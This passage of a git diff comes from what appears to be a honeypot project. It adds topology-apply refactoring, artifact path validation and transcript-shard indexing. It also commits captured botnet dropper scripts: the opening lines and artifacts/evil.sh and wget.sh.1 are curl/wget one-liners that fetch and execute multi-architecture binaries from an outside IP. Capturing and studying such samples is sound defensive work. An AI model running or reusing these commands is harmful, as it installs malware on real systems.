curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
|
||||||
|
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
|
||||||
|
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
|
||||||
|
|
||||||
|
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||||
|
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||||
|
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||||
|
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||||
|
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||||
|
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||||
|
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
|
||||||
|
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
|
||||||
|
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||||
|
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||||
|
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||||
3
artifacts/evil.sh
Normal file
3
artifacts/evil.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
wget http://31.56.209.39/wget.sh -o wget.sh
|
||||||
|
|
||||||
|
wget http://31.56.209.39/curl.sh -o curl.sh
|
||||||
3
artifacts/wget.sh
Normal file
3
artifacts/wget.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
[0] Downloading 'http://31.56.209.39/wget.sh' ...
|
||||||
|
Saving 'wget.sh.1'
|
||||||
|
HTTP response 200 OK [http://31.56.209.39/wget.sh]
|
||||||
46
artifacts/wget.sh.1
Normal file
46
artifacts/wget.sh.1
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
ulimit -n 4096
|
||||||
|
ulimit -n 999999
|
||||||
|
ulimit -v 2097152
|
||||||
|
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||||
|
rm -rf odin*
|
||||||
|
rm -rf bizy*
|
||||||
|
rm -rf rs*
|
||||||
|
rm -rf *.sh
|
||||||
|
|
||||||
|
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||||
|
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||||
|
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||||
|
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||||
|
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||||
|
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||||
|
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||||
|
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||||
|
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||||
|
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||||
|
|
||||||
|
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
|
||||||
|
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
|
||||||
|
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
|
||||||
|
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
|
||||||
|
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
|
||||||
|
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
|
||||||
|
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
|
||||||
|
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
|
||||||
|
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
|
||||||
|
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
|
||||||
|
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
|
||||||
|
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
|
||||||
|
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
|
||||||
|
|
||||||
|
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||||
|
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||||
|
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||||
|
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||||
|
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||||
|
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||||
|
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
|
||||||
|
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
|
||||||
|
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||||
|
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||||
|
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||||
0
bait/.gitkeep
Normal file
0
bait/.gitkeep
Normal file
5
bait/README.md
Normal file
5
bait/README.md
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
# bait/
|
||||||
|
|
||||||
|
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this directory read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries are appended to the hardcoded bait baseline: they add to the realism-engine output and never replace it.
|
||||||
|
|
||||||
|
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
|
||||||
BIN
decnet.tar
Normal file
BIN
decnet.tar
Normal file
Binary file not shown.
@@ -194,7 +194,7 @@ async def self_destruct() -> None:
|
|||||||
argv = ["/bin/bash", path]
|
argv = ["/bin/bash", path]
|
||||||
spawn_kwargs = {"start_new_session": True}
|
spawn_kwargs = {"start_new_session": True}
|
||||||
|
|
||||||
subprocess.Popen( # nosec B603
|
subprocess.Popen( # type: ignore[call-overload] # nosec B603
|
||||||
argv,
|
argv,
|
||||||
stdin=subprocess.DEVNULL,
|
stdin=subprocess.DEVNULL,
|
||||||
stdout=subprocess.DEVNULL,
|
stdout=subprocess.DEVNULL,
|
||||||
|
|||||||
@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
from decnet import __version__ as _v
|
from decnet import __version__ as _v # type: ignore[attr-defined]
|
||||||
agent_version = _v
|
agent_version = _v
|
||||||
except Exception:
|
except Exception:
|
||||||
agent_version = "unknown"
|
agent_version = "unknown"
|
||||||
|
|||||||
@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
|
|||||||
return str(tid)
|
return str(tid)
|
||||||
|
|
||||||
|
|
||||||
|
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
    """Gate an apply on hash agreement and topology validity.

    The canonical hash of ``hydrated`` is recomputed locally and compared
    with ``version_hash``; only then is the topology validated.

    Returns:
        The topology id extracted from ``hydrated``.

    Raises:
        HashMismatch: the locally computed hash differs from
            ``version_hash``.
        ValidationError: ``_validation_errors`` reports something for the
            issues returned by ``_validate_topology``.
    """
    agent_hash = canonical_hash(hydrated)
    if agent_hash != version_hash:
        message = (
            f"master hash {version_hash!r} does not match agent hash "
            f"{agent_hash!r} — refusing to apply"
        )
        raise HashMismatch(message)

    found = _validate_topology(hydrated)
    if _validation_errors(found):
        raise ValidationError(found)

    return _topology_id(hydrated)
|
||||||
|
|
||||||
|
|
||||||
|
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
    """Remove the stored topology when it is not ``topology_id``.

    The master's word wins: if the store holds some other topology — fully
    applied, partially applied, or drifted — it is torn down before the new
    apply goes ahead. Answering 409 instead would strand the agent in a
    state that only a human could untangle.

    Nothing happens when the store is empty or already holds
    ``topology_id``. Teardown failures are logged and swallowed so the new
    apply can still be attempted.
    """
    current = store.current()
    if current is None:
        return

    stale_id = current.topology_id
    if stale_id == topology_id:
        return

    log.info(
        "superseding topology %s with %s on master authority",
        stale_id, topology_id,
    )
    try:
        await teardown(stale_id, store)
    except Exception as exc:  # noqa: BLE001 — we still want to try applying
        log.warning(
            "best-effort teardown of superseded topology %s failed: %s",
            stale_id, exc,
        )
        # Drop the store row outright so a half-torn-down predecessor
        # cannot block the new apply. Any docker objects left behind show
        # up in the next heartbeat's observed block.
        # NOTE(review): indentation was lost in the reviewed view; this
        # clear is assumed to belong to the failure branch — confirm.
        store.clear(stale_id)
|
||||||
|
|
||||||
|
|
||||||
|
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
    """Build the bridge networks, emit the compose file, and start containers.

    This function is synchronous and blocking; async callers have to run
    it through ``asyncio.to_thread``.

    Why ``--always-recreate-deps``: each decky service attaches to its
    base's network namespace with ``network_mode: container:<base>``, and
    that attachment is fixed when the service starts. Should the base be
    recreated (for instance because ``ports:`` changed after
    ``forwards_l3`` was toggled) while compose considers the services
    unchanged, those services hold a stale netns FD for the destroyed
    base. They then sit in an empty namespace containing only ``lo``
    while outside traffic reaches a closed port on the live base.
    Recreating dependents together with the base is the cheapest way to
    rule that race out.
    """
    compose_file = _topology_compose_path(topology_id)
    docker_client = docker.from_env()

    # One bridge per LAN; only the DMZ LAN is left non-internal.
    for lan_spec in hydrated["lans"]:
        create_bridge_network(
            docker_client,
            _topology_network_name(topology_id, lan_spec["name"]),
            lan_spec["subnet"],
            internal=not lan_spec["is_dmz"],
        )

    write_topology_compose(hydrated, compose_file)
    _compose_with_retry(
        "up", "--build", "-d", "--always-recreate-deps",
        compose_file=compose_file,
    )
|
||||||
|
|
||||||
|
|
||||||
async def apply(
|
async def apply(
|
||||||
hydrated: dict[str, Any],
|
hydrated: dict[str, Any],
|
||||||
version_hash: str,
|
version_hash: str,
|
||||||
@@ -73,76 +140,11 @@ async def apply(
|
|||||||
Any docker / compose error propagates up; the endpoint maps it
|
Any docker / compose error propagates up; the endpoint maps it
|
||||||
to 500 and records the message on the store row.
|
to 500 and records the message on the store row.
|
||||||
"""
|
"""
|
||||||
local_hash = canonical_hash(hydrated)
|
topology_id = _check_hash_and_validate(hydrated, version_hash)
|
||||||
if local_hash != version_hash:
|
await _teardown_superseded(topology_id, store)
|
||||||
raise HashMismatch(
|
await asyncio.to_thread(_materialise, hydrated, topology_id)
|
||||||
f"master hash {version_hash!r} does not match agent hash "
|
|
||||||
f"{local_hash!r} — refusing to apply"
|
|
||||||
)
|
|
||||||
|
|
||||||
issues = _validate_topology(hydrated)
|
|
||||||
if _validation_errors(issues):
|
|
||||||
raise ValidationError(issues)
|
|
||||||
|
|
||||||
topology_id = _topology_id(hydrated)
|
|
||||||
# Master is authoritative. If a different topology is pinned here
|
|
||||||
# — whether it fully applied, only partially applied (failure
|
|
||||||
# marker row + orphan containers), or drifted — teardown first,
|
|
||||||
# then accept the new one. Refusing with 409 would leave the
|
|
||||||
# agent stuck in a state only a human could resolve.
|
|
||||||
existing = store.current()
|
|
||||||
if existing is not None and existing.topology_id != topology_id:
|
|
||||||
log.info(
|
|
||||||
"superseding topology %s with %s on master authority",
|
|
||||||
existing.topology_id, topology_id,
|
|
||||||
)
|
|
||||||
try:
|
|
||||||
await teardown(existing.topology_id, store)
|
|
||||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
|
||||||
log.warning(
|
|
||||||
"best-effort teardown of superseded topology %s failed: %s",
|
|
||||||
existing.topology_id, exc,
|
|
||||||
)
|
|
||||||
# Hard-clear the store row so the new apply isn't blocked
|
|
||||||
# by a half-torn-down predecessor. Leftover docker objects
|
|
||||||
# will surface via the next heartbeat's observed block.
|
|
||||||
store.clear(existing.topology_id)
|
|
||||||
|
|
||||||
lans = hydrated["lans"]
|
|
||||||
compose_path = _topology_compose_path(topology_id)
|
|
||||||
client = docker.from_env()
|
|
||||||
|
|
||||||
# Bridges + compose are sync/blocking; hop to a thread so we don't
|
|
||||||
# stall the event loop on a slow docker daemon.
|
|
||||||
def _materialise() -> None:
|
|
||||||
for lan in lans:
|
|
||||||
net_name = _topology_network_name(topology_id, lan["name"])
|
|
||||||
internal = not lan["is_dmz"]
|
|
||||||
create_bridge_network(
|
|
||||||
client, net_name, lan["subnet"], internal=internal
|
|
||||||
)
|
|
||||||
write_topology_compose(hydrated, compose_path)
|
|
||||||
# ``--always-recreate-deps`` keeps service containers' netns shares
|
|
||||||
# fresh: every decky service joins its base's netns via
|
|
||||||
# ``network_mode: container:<base>``, and that share is bound at
|
|
||||||
# service start time. If a base is recreated (e.g. when ``ports:``
|
|
||||||
# changes after toggling ``forwards_l3``) but compose decides the
|
|
||||||
# services are unchanged, the services keep a stale netns FD
|
|
||||||
# pointing at the destroyed base — they end up in an empty
|
|
||||||
# namespace with only ``lo``, and external traffic hits a closed
|
|
||||||
# port on the live base. Forcing dependents to recreate alongside
|
|
||||||
# the base is the cheapest way to make this race impossible.
|
|
||||||
_compose_with_retry(
|
|
||||||
"up", "--build", "-d", "--always-recreate-deps",
|
|
||||||
compose_file=compose_path,
|
|
||||||
)
|
|
||||||
|
|
||||||
await asyncio.to_thread(_materialise)
|
|
||||||
|
|
||||||
store.put(topology_id, version_hash, hydrated)
|
store.put(topology_id, version_hash, hydrated)
|
||||||
log.info(
|
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
|
||||||
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
async def teardown(
|
async def teardown(
|
||||||
|
|||||||
@@ -63,6 +63,7 @@ class TopologyStore:
|
|||||||
# The agent is single-process, so there's no real contention —
|
# The agent is single-process, so there's no real contention —
|
||||||
# sqlite's own connection lock is enough.
|
# sqlite's own connection lock is enough.
|
||||||
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
||||||
|
self._conn.row_factory = sqlite3.Row
|
||||||
self._conn.execute(
|
self._conn.execute(
|
||||||
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
||||||
" topology_id TEXT PRIMARY KEY,"
|
" topology_id TEXT PRIMARY KEY,"
|
||||||
@@ -84,11 +85,11 @@ class TopologyStore:
|
|||||||
if row is None:
|
if row is None:
|
||||||
return None
|
return None
|
||||||
return AppliedRow(
|
return AppliedRow(
|
||||||
topology_id=row[0],
|
topology_id=row["topology_id"],
|
||||||
applied_version_hash=row[1],
|
applied_version_hash=row["applied_version_hash"],
|
||||||
hydrated=json.loads(row[2]),
|
hydrated=json.loads(row["hydrated_blob_json"]),
|
||||||
applied_at=int(row[3]),
|
applied_at=int(row["applied_at"]),
|
||||||
last_error=row[4],
|
last_error=row["last_error"],
|
||||||
)
|
)
|
||||||
|
|
||||||
# ---------------------------------------------------------------- writes
|
# ---------------------------------------------------------------- writes
|
||||||
|
|||||||
1
decnet/artifacts/__init__.py
Normal file
1
decnet/artifacts/__init__.py
Normal file
@@ -0,0 +1 @@
|
|||||||
|
"""Artifact storage helpers shared between the web router and TTP workers."""
|
||||||
86
decnet/artifacts/paths.py
Normal file
86
decnet/artifacts/paths.py
Normal file
@@ -0,0 +1,86 @@
|
|||||||
|
"""
|
||||||
|
Shared on-disk artifact path resolution.
|
||||||
|
|
||||||
|
Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
|
||||||
|
quarantine tree:
|
||||||
|
|
||||||
|
/var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
|
||||||
|
|
||||||
|
Two callers need to translate ``(decky, stored_as, service)`` into a
|
||||||
|
concrete ``Path`` rooted under that tree:
|
||||||
|
|
||||||
|
* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
|
||||||
|
(``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
|
||||||
|
download for the dashboard.
|
||||||
|
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
|
||||||
|
reads the stored ``.eml`` at tag-time so body-aware predicates
|
||||||
|
(R0047 BEC, R0048 macro) don't need raw body text on the bus.
|
||||||
|
|
||||||
|
Both callers share the same validation rules and the same
|
||||||
|
defence-in-depth symlink-escape check; this module is the single
|
||||||
|
implementation. It is auth-agnostic — wrappers layer authentication
|
||||||
|
where appropriate (the router does ``require_admin``, the lifter does
|
||||||
|
not).
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
# decky names come from the deployer — lowercase alnum plus hyphens.
|
||||||
|
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
|
||||||
|
|
||||||
|
# Services that own an artifacts subdir. Kept explicit so a caller
|
||||||
|
# can't pivot into arbitrary subpaths via a query string or bus payload.
|
||||||
|
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
|
||||||
|
|
||||||
|
# stored_as is assembled by the capturing template as:
|
||||||
|
# ${ts}_${sha:0:12}_${base}
|
||||||
|
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
|
||||||
|
# and base is the original filename's basename. Keep the filename charset
|
||||||
|
# tight but allow common punctuation dropped files actually use.
|
||||||
|
_STORED_AS_RE = re.compile(
|
||||||
|
r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Module-level so tests can monkeypatch. Override via env in production
|
||||||
|
# (the systemd unit sets this) — the prod path matches the bind mount
|
||||||
|
# declared in decnet/services/{ssh,smtp}.py.
|
||||||
|
ARTIFACTS_ROOT = Path(
|
||||||
|
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
class ArtifactPathError(ValueError):
    """Signals that ``(decky, stored_as, service)`` is not acceptable.

    Raised when any of the three inputs fails validation, or when the
    resolved path would land outside the artifacts root.

    Callers react differently: the router catches it and re-raises
    ``HTTPException(400)``; the lifter catches it and treats the event as
    having no body available (no-tag).
    """
|
||||||
|
|
||||||
|
|
||||||
|
def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
    """Validate inputs, resolve the on-disk path, and confirm it stays
    inside the artifacts root.

    Args:
        decky: Decky name; must match ``_DECKY_RE``.
        stored_as: Stored filename; must match ``_STORED_AS_RE``.
        service: Owning service; must be one of ``_ALLOWED_SERVICES``.

    Returns:
        The fully resolved path ``ARTIFACTS_ROOT/decky/service/stored_as``.

    Raises:
        ArtifactPathError: on any violation, including inputs that are not
            strings at all. Does NOT check that the file exists — callers
            handle that distinctly (404 for the router, no-tag for the
            lifter).
    """
    # Inputs can originate from a query string or a bus payload, so a
    # missing field may arrive as None (or some other non-str). Without
    # the isinstance guards the regex / set lookups would raise TypeError,
    # which callers catching ArtifactPathError would not handle.
    if not isinstance(service, str) or service not in _ALLOWED_SERVICES:
        raise ArtifactPathError("invalid service")
    if not isinstance(decky, str) or not _DECKY_RE.fullmatch(decky):
        raise ArtifactPathError("invalid decky name")
    if not isinstance(stored_as, str) or not _STORED_AS_RE.fullmatch(stored_as):
        raise ArtifactPathError("invalid stored_as")

    root = ARTIFACTS_ROOT.resolve()
    candidate = (root / decky / service / stored_as).resolve()
    # defence-in-depth: even though the regexes reject `..`, make sure a
    # symlink or weird filesystem state can't escape the root.
    if root not in candidate.parents and candidate != root:
        raise ArtifactPathError("path escapes artifacts root")
    return candidate
|
||||||
129
decnet/artifacts/shards.py
Normal file
129
decnet/artifacts/shards.py
Normal file
@@ -0,0 +1,129 @@
|
|||||||
|
"""Shared asciinema shard helpers.
|
||||||
|
|
||||||
|
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
|
||||||
|
so non-router callers (the BEHAVE-SHELL session-ended handler in
|
||||||
|
``decnet/profiler/worker.py``, the collector's session aggregator)
|
||||||
|
can resolve shard paths without crossing the layer boundary into the
|
||||||
|
FastAPI router.
|
||||||
|
|
||||||
|
Functions here speak in :class:`ValueError` — callers that want HTTP
|
||||||
|
semantics translate at the boundary. The router wrappers keep their
|
||||||
|
existing ``HTTPException`` behaviour for backwards compatibility.
|
||||||
|
|
||||||
|
PII boundary unchanged: shards live on disk; this module returns
|
||||||
|
:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
|
||||||
|
cache stores byte offsets only.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
from collections import OrderedDict
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
ARTIFACTS_ROOT = Path(
|
||||||
|
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
|
||||||
|
)
|
||||||
|
|
||||||
|
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
|
||||||
|
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
|
||||||
|
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
|
||||||
|
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
|
||||||
|
|
||||||
|
# (path, mtime_ns) → {sid: [(offset, length), ...]}
|
||||||
|
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
|
||||||
|
OrderedDict()
|
||||||
|
)
|
||||||
|
_CACHE_MAX = 32
|
||||||
|
|
||||||
|
|
||||||
|
def validate_names(decky: str, service: str) -> None:
    """Reject ``decky`` / ``service`` values that do not fit the expected shape.

    Raises:
        ValueError: ``decky`` does not match ``_DECKY_RE`` or ``service``
            does not match ``_SERVICE_RE``. The decky is checked first.
    """
    if _DECKY_RE.fullmatch(decky) is None:
        raise ValueError(f"invalid decky name: {decky!r}")
    if _SERVICE_RE.fullmatch(service) is None:
        raise ValueError(f"invalid service: {service!r}")
|
||||||
|
|
||||||
|
|
||||||
|
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
    """Map a shard name to its resolved path under the artifacts root.

    The result is the resolved form of
    ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``.

    Raises:
        ValueError: the names fail :func:`validate_names`, ``shard_name``
            does not match ``_SHARD_BASENAME_RE``, or the resolved path is
            neither the artifacts root nor located beneath it.
    """
    validate_names(decky, service)
    if _SHARD_BASENAME_RE.fullmatch(shard_name) is None:
        raise ValueError(f"invalid shard name: {shard_name!r}")

    root = ARTIFACTS_ROOT.resolve()
    resolved = root.joinpath(decky, service, "transcripts", shard_name).resolve()

    # Escape detection: after symlink resolution the path must still be
    # the root itself or have the root among its ancestors.
    stays_inside = resolved == root or root in resolved.parents
    if not stays_inside:
        raise ValueError(f"path escapes artifacts root: {resolved}")
    return resolved
|
||||||
|
|
||||||
|
|
||||||
|
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
    """Scan a shard once and record where each session's lines live.

    The file is read in binary mode line by line. Every line in which
    ``_SID_LINE_RE`` finds a sid contributes one ``(byte_offset,
    byte_length)`` pair to that sid's list; lines without a sid only
    advance the running offset.
    """
    spans: dict[str, list[tuple[int, int]]] = {}
    cursor = 0
    with path.open("rb") as handle:
        for raw in handle:
            size = len(raw)
            hit = _SID_LINE_RE.search(raw)
            if hit is not None:
                session_id = hit.group(1).decode("ascii")
                spans.setdefault(session_id, []).append((cursor, size))
            cursor += size
    return spans
|
||||||
|
|
||||||
|
|
||||||
|
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
    """Return ``(sid → [(offset, length), …], file_size)``.

    Cached by ``(path, mtime_ns)``; rebuilt when the shard changes. The
    cache is an LRU bounded by ``_CACHE_MAX`` entries.

    Args:
        path: Shard file to index.

    Returns:
        The sid index and the file size reported by ``path.stat()`` taken
        at the start of the call.

    Raises:
        OSError: propagated from ``path.stat()`` or from reading the file.
    """
    st = path.stat()
    path_key = str(path)
    key = (path_key, st.st_mtime_ns)

    cached = _INDEX_CACHE.get(key)
    if cached is not None:
        _INDEX_CACHE.move_to_end(key)
        return cached, st.st_size

    index = _build_index(path)

    # A miss means the shard is new or its mtime moved. Entries for the
    # same path under an older mtime can no longer be hit, so drop them
    # now instead of letting them occupy LRU slots and push out live
    # indices for other shards.
    for stale in [k for k in _INDEX_CACHE if k[0] == path_key]:
        del _INDEX_CACHE[stale]

    _INDEX_CACHE[key] = index  # new keys land at the most-recent end
    while len(_INDEX_CACHE) > _CACHE_MAX:
        _INDEX_CACHE.popitem(last=False)
    return index, st.st_size
|
||||||
|
|
||||||
|
|
||||||
|
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
    """Locate the ``sessions-YYYY-MM-DD.jsonl`` shard that contains ``sid``.

    Shards in the decky's transcripts directory are tried in descending
    sort order, i.e. newest date first, because most lookups concern
    recent sessions. Each shard's sid index comes from :func:`get_index`,
    which caches it until the shard's mtime changes.

    Returns:
        The first shard whose index holds ``sid``; ``None`` when no shard
        does, when the transcripts directory resolves outside the
        artifacts root, or when it is missing / unreadable. ``OSError``
        from listing the directory or indexing a shard is swallowed —
        callers treat ``None`` as "skip".

    Raises:
        ValueError: ``decky`` / ``service`` fail :func:`validate_names`.
    """
    validate_names(decky, service)

    artifacts_root = ARTIFACTS_ROOT.resolve()
    session_dir = (artifacts_root / decky / service / "transcripts").resolve()
    if artifacts_root not in session_dir.parents:
        return None

    try:
        if not session_dir.is_dir():
            return None
        children = list(session_dir.iterdir())
    except OSError:  # PermissionError is an OSError subclass
        return None

    candidates = [
        child for child in children
        if _SHARD_BASENAME_RE.fullmatch(child.name)
    ]
    candidates.sort(reverse=True)

    for shard_path in candidates:
        try:
            sid_index, _ = get_index(shard_path)
        except OSError:
            # Unreadable shard: move on to the next one.
            continue
        if sid in sid_index:
            return shard_path
    return None
|
||||||
@@ -13,7 +13,7 @@ from typing import Sequence
|
|||||||
from decnet.asn.base import Provider
|
from decnet.asn.base import Provider
|
||||||
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
||||||
from decnet.asn.iptoasn.parse import parse_file
|
from decnet.asn.iptoasn.parse import parse_file
|
||||||
from decnet.asn.lookup import AsnLookup
|
from decnet.asn.lookup import AsnLookup, Range
|
||||||
from decnet.asn.paths import ensure_root
|
from decnet.asn.paths import ensure_root
|
||||||
|
|
||||||
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
||||||
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
|
|||||||
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
||||||
)
|
)
|
||||||
|
|
||||||
ranges = []
|
ranges: list[Range] = []
|
||||||
for path in self.data_paths():
|
for path in self.data_paths():
|
||||||
if not path.exists():
|
if not path.exists():
|
||||||
continue
|
continue
|
||||||
|
|||||||
@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
|
|||||||
up at all we no-op.
|
up at all we no-op.
|
||||||
"""
|
"""
|
||||||
try:
|
try:
|
